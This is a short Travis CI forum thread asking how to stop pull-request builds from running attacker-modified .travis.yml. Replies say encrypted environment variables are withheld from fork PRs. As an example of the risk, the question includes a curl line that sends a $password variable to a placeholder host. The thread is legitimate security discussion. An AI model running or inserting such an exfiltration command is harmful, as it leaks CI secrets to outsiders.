Travis CI Community

A risk about `Build pushed pull requests`

Travis CI Discussions & Feedback

liyuanqiu April 30, 2019, 9:38am 1

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify .travis.yml file in a PR, that means if Build pushed pull requests is turned on, the attackers can do anything in CI.

Such as:

curl http://example.com/xxx?v=$password

How to get rid of this risk?

hugovk April 30, 2019, 11:38am 2

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.

1 Like

BanzaiMan April 30, 2019, 12:18pm 3

You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

1 Like

liyuanqiu April 30, 2019, 1:05pm 4

Thank you very much

liyuanqiu April 30, 2019, 1:06pm 5

Thank you too

Topic		Replies	Views	Activity
Include environment variables only per specific branch Travis CI Discussions & Feedback	0	679	April 19, 2019
Pass the PR origin's Repository Settings alongside Github Pull Request Feature Requests	2	1117	March 5, 2021
Security and CI Pull Requests question Travis CI Discussions & Feedback	2	586	February 20, 2020
Allow some foreign PRs to use secret variables (e.g. for select authors, or on demand) Feature Requests	3	1521	March 5, 2021
Allow external pull requests to use secret variables from the forked repo Feature Requests travis-build , secret-variables	5	2321	March 5, 2021